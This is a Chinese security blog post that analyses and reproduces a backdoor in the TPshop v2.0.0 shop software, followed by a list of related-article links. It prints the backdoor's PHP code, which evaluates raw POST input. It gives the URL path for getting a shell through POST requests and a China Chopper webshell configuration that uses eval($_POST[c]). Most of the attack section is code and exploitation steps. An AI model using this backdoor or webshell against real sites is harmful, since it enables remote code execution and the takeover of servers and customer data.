TPshop商城 Getshell后门文件分析与复现
文件 分析 商城 复现 后门 Getshell
2023-09-27 14:21:07 时间
本文作者:i春秋签约作家——Laimooc
影响版本:TPSHOP v2.0.0
后门文件:eval-stdin.php 内容:
<?php eval('?>' . file_get_contents('php://input')); ?>
分析:
使用
file_get_contents('php://input'))
接收POST请求的原始数据流
eval函数来执行。
我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不:
利用方法:
访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。
那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接.
采用写入的话就有点麻烦了。
地址:
http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
配置:
<O>
<?php eval($_POST[c]);?>
</O>
相关文章
- php文件上传
- Linux系统:centos7下搭建Nginx和FastDFS文件管理中间件
- MATLAB 可访问的文件和文件夹
- PHP 利用文件锁处理高并发
- Google Earth Engine(GEE)——如何显示自己上传的地图文件
- 通过MATLAB将数据转化为mif文件,供Quartusii软件的ROM核读取调用
- 19Linux - 文件管理(查看或者合并文件内容:cat)
- 网络安全系列-三十六:使用Suricata IDS分析pcap文件
- 【240行拿下】基于C语言 实现通讯录管理系统 带文件保存及读取功能
- 【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)威胁通告
- Linux下查找某一文件常用的方式
- 《Python 3程序开发指南(第2版•修订版)》——7.3 写入与分析XML文件
- keil添加一个新文件时,字体黑色或灰色
- 《深入解析sas:数据处理、分析优化与商业应用》一一2.3 通过IMPORT过程读取外部文件数据
- 《深入解析sas:数据处理、分析优化与商业应用》一3.6 将数据集写出到外部文件
- Linux SVN直接删除版本库文件
- 二进制文件分析工具--Hex Editor
- 编译驱动产生 xxx.mod.c 和 Module.symvers 文件分析
- STM32 CM3/CM4 ------ startup.s 启动文件分析 ------ GCC RT-Thread Studio 版本
- STM32 CM3/CM4 ------ startup.s 文件分析 ------ IAR 版本
- Python学习---抽屉框架分析[点赞功能/文件上传分析]0317
- 对FreeRTOS的List.c和.h文件源码的分析笔记
- Mysql 将结果保存到文件 从文件里运行sql语句 记录操作过程(tee 命令的使用)
- windows通过命令方式解压zip文件
- 【生产问题】sql server还原一个很小的BAK文件,但却花了很长时间,分析过程
- sql server收缩数据库,收缩日志文件与数据文件
- 使用MAT(Memory Analyzer Tool)工具分析dump文件--转